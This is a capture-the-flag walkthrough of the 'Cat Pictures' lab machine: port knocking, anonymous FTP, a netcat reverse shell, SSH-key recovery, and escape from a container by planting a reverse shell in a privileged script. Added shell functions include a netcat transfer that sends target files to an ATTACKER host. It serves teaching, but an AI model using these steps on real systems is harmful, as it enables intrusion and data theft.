Cat Pictures

Last updated 3 years ago

Scanning

Let's run some nmap scans to see which ports and services are open on the machine. A full TCP range scan (-p-) is worth the extra time here, since the later steps use non-standard ports.

Enumeration

Let's visit the website on port 8080.

Let's look at the first forum post.

This message looks like a hint at port knocking. To do this we can use the knock client, which ships with the knockd package. Let's install it.

Now let's use the knock command (a few times: the daemon only opens the port if the whole sequence arrives in order and within its timeout) and then run the nmap scan again.

We can see that port 21 is now open and anonymous login is allowed. Let's check it out and pull any files on the server down to our machine.
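The knock-then-rescan loop above, as an added example that is not part of the original writeup: it sends the knock sequence, rescans, and diffs the two grepable nmap outputs so newly opened ports stand out instead of being picked out by eye. TARGET and KNOCK_SEQ are placeholders (the real values come from the forum post and the screenshots), the `nc -z` fallback assumes an nc that supports `-z` and `-w`, and the sample scan lines in the usage note are constructed.

```shell
#!/bin/sh
# Added example, not from the original writeup. TARGET and KNOCK_SEQ are
# placeholders: the real values come from the forum post and screenshots.
TARGET="${TARGET:-10.10.10.10}"
KNOCK_SEQ="${KNOCK_SEQ:-1111 2222 3333}"

# Send the knock sequence. The knock client from the knockd package is the
# usual tool; fall back to nc when it is missing. Every connection is expected
# to fail: knockd only watches for the SYNs arriving in the right order.
send_knock() {
    host=$1; shift
    if command -v knock >/dev/null 2>&1; then
        knock "$host" "$@"
    else
        for p in "$@"; do
            nc -z -w 1 "$host" "$p" >/dev/null 2>&1 || true
        done
    fi
}

# Full TCP range scan in grepable form, which is easy to diff.
scan_ports() {
    nmap -p- -T4 -oG - "$1" 2>/dev/null
}

# Print the ports that are open in the second -oG output but not in the
# first, one per line, lowest first. Filtered and closed ports are ignored.
new_open_ports() {
    {
        printf '%s\n' "$1" | sed 's/^/B /'
        printf '%s\n' "$2" | sed 's/^/A /'
    } | awk '
        /^[AB] Host:/ {
            tag = $1
            for (i = 2; i <= NF; i++) {
                if ($i ~ "^[0-9]+/open/") {
                    split($i, f, "/")
                    if (tag == "B") seen[f[1]] = 1
                    else if (!(f[1] in seen)) fresh[f[1]] = 1
                }
            }
        }
        END { for (p in fresh) print p }' | sort -n
}

# Usage against a live target (not exercised offline):
#   before=$(scan_ports "$TARGET")
#   send_knock "$TARGET" $KNOCK_SEQ     # unquoted on purpose: one argument per port
#   after=$(scan_ports "$TARGET")
#   new_open_ports "$before" "$after"   # prints e.g. 21 once the knock worked
```

Send the knocks back to back: knockd has a per-sequence timeout, so a pause between ports (or a port scan of your own in between) resets it, which is the usual reason a knock "has to be done a few times".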

OK, so let's connect to port 4420 on the machine using netcat.

Exploitation

Let's try to get a reverse shell on the machine. First, start a netcat listener.

We have a reverse shell on the machine. Let's check what files there are on it.

Let's download this file to our machine using netcat.

First we start a netcat listener on our machine.

Then we send the file from the target using netcat.

We should now have the runme file on our machine. Netcat gives no indication that the transfer completed, so compare a checksum on both ends before analysing the file.
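The netcat transfer above with an integrity check, as an added example that is not part of the original writeup. A raw nc stream has no end-of-file marker and no checksum, so a connection that drops halfway leaves a truncated file that `file` will still happily identify; hashing on both ends catches that. ATTACKER and the port are placeholders, the nc flags assume the OpenBSD/Kali variant, and the file used in the offline check is constructed.

```shell
#!/bin/sh
# Added example, not from the original writeup. ATTACKER and the port are
# placeholders. nc has no end-of-stream or integrity signalling: a dropped
# connection leaves a truncated file that looks fine, so hash on both ends.

# Run on the attacker machine (receiver). Everything that arrives goes to OUT.
# The flags assume the OpenBSD/Kali nc; other variants name them differently.
receive_file() {
    port=$1; out=$2
    nc -lvnp "$port" > "$out"
}

# Run on the target (sender), from the reverse shell. Print the hash first so
# it is visible in the shell, then stream the bytes. Ctrl-C the sender once the
# hash on the receiving side matches; nc does not always close by itself.
send_file() {
    host=$1; port=$2; file=$3
    sha256sum "$file"
    nc "$host" "$port" < "$file"
}

# Returns 0 when FILE hashes to EXPECTED (the value the sender printed),
# 1 otherwise. Busybox and most Linux targets ship sha256sum; if the target
# only has md5sum or shasum, use the same tool on both sides.
verify_transfer() {
    expected=$1; file=$2
    actual=$(sha256sum "$file" | cut -d' ' -f1)
    [ "$actual" = "$expected" ]
}

# Usage:
#   receive_file 4445 runme                  (attacker, first)
#   send_file ATTACKER 4445 /path/to/runme   (target, from the reverse shell)
#   verify_transfer <hash printed by sender> runme && file runme
```

If the hashes differ, re-run the transfer rather than analysing the partial file: a truncated ELF still passes `file` and `strings`, but the interesting data is usually what got cut off.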

Let's check the file type of the runme file.

It's a binary, so let's run the strings command to get more information about it.
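The strings step above, as an added example that is not part of the original writeup: a minimal strings(1) in plain shell (handy when the tool is missing on a box, and the same idea as `strings -n N`) plus a filter for the credential-looking lines that are the first thing to look for in a binary that asks for a password. The keyword list is an assumption, and the binary used in the offline check is constructed.

```shell
#!/bin/sh
# Added example, not from the original writeup. A minimal strings(1) in shell:
# useful when strings is not installed on a box, and for filtering the output
# down to the lines that matter, which is what the runme binary gave away.

# Print runs of at least MINLEN printable characters found in FILE (default 4,
# the same default as strings). LC_ALL=C keeps tr working byte by byte so
# arbitrary binary content does not trip multibyte handling.
extract_strings() {
    file=$1; minlen=${2:-4}
    LC_ALL=C tr -c '[:print:]' '\n' < "$file" | grep -E "^.{$minlen,}$"
}

# Same, but only lines that mention passwords, users, keys, or paths a
# password-gated binary is likely to touch. Keyword list is an assumption;
# extend it for the target.
credential_hints() {
    extract_strings "$1" "${2:-4}" | grep -iE 'pass|user|login|key|ssh|/tmp|/home'
}

# Usage: extract_strings runme 6        (raise MINLEN to cut the noise)
#        credential_hints runme
```

Raise the minimum length once the first pass is too noisy; most of the junk in a stripped ELF is short, and the prompts, paths and embedded secrets are rarely under six characters.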

The highlighted lines are interesting: let's run the binary on the machine and supply the password we see here to check what happens. We also have to run it from the /tmp directory, since the output shows it changing into that directory after the password is entered. Run the binary and then check the contents of the catlover directory to see what changed.

Looks like we have an id_rsa file. Let's copy the content of this file into a file on our machine and then log in through SSH.

Now let's log in. First we have to set the key permissions (ssh refuses a private key that is readable by other users, so chmod 600 it). The username we are going to log in as, catlover, was found when we ran strings on the binary.

We are now root.

We have the first flag, but not the root flag, so let's explore the machine a bit more. A root shell that still has no root flag is a strong hint that this shell is not on the host itself (a container, for example), so the remaining work is finding a way from here onto the host.
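The "root but no root flag" situation above, as an added example that is not part of the original writeup: a quick set of checks for the usual container tells, so you know whether to keep looking for a host-side foothold rather than a privilege escalation. The ROOT parameter only exists so the checks can be pointed at a fake tree offline; in practice call it with no argument. The cgroup keywords are an assumption, and the fake tree in the check is constructed.

```shell
#!/bin/sh
# Added example, not from the original writeup. Being root but missing the
# root flag usually means the shell is not on the host. These checks look for
# the usual container tells. ROOT is a parameter only so the checks can be run
# against a fake tree for testing; call container_hints with no argument.
container_hints() {
    root=${1:-}
    hits=0
    if [ -e "$root/.dockerenv" ]; then
        echo "/.dockerenv exists (Docker)"; hits=$((hits + 1))
    fi
    # Keyword list is an assumption; it covers Docker, LXC, Kubernetes, containerd.
    if [ -r "$root/proc/1/cgroup" ] && grep -qE 'docker|lxc|kubepods|containerd' "$root/proc/1/cgroup"; then
        echo "/proc/1/cgroup mentions a container runtime"; hits=$((hits + 1))
    fi
    if [ -r "$root/proc/1/comm" ] && ! grep -qE '^(init|systemd)$' "$root/proc/1/comm"; then
        echo "PID 1 is $(cat "$root/proc/1/comm"), not init/systemd"; hits=$((hits + 1))
    fi
    if [ -r "$root/proc/mounts" ] && grep -q '^overlay / ' "$root/proc/mounts"; then
        echo "root filesystem is an overlay mount"; hits=$((hits + 1))
    fi
    # Exit 0 when at least one tell was found, 1 when none were.
    [ "$hits" -gt 0 ]
}

# Usage: container_hints && echo "probably a container: look for host-side
# cron jobs, mounted volumes, or an exposed Docker socket"
```

None of these is conclusive on its own (a VM with an overlay root exists, and a container can run systemd), but two or more together are a reliable signal, and the follow-up is the same either way: look for anything the host runs that you can write to from inside.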

Privilege Escalation

Looking through the system, there is an interesting file. Let's read it.

Looks like they are adding a reverse shell to the file. Let's do the same, so that we get a reverse shell as a higher-privileged user, root.

Once we have changed the content of the file, save it and start a netcat listener on our machine.

After a while, you should get a reverse shell back on your listener.

You can now read the root flag.

The reverse shell one-liner used above can be found here.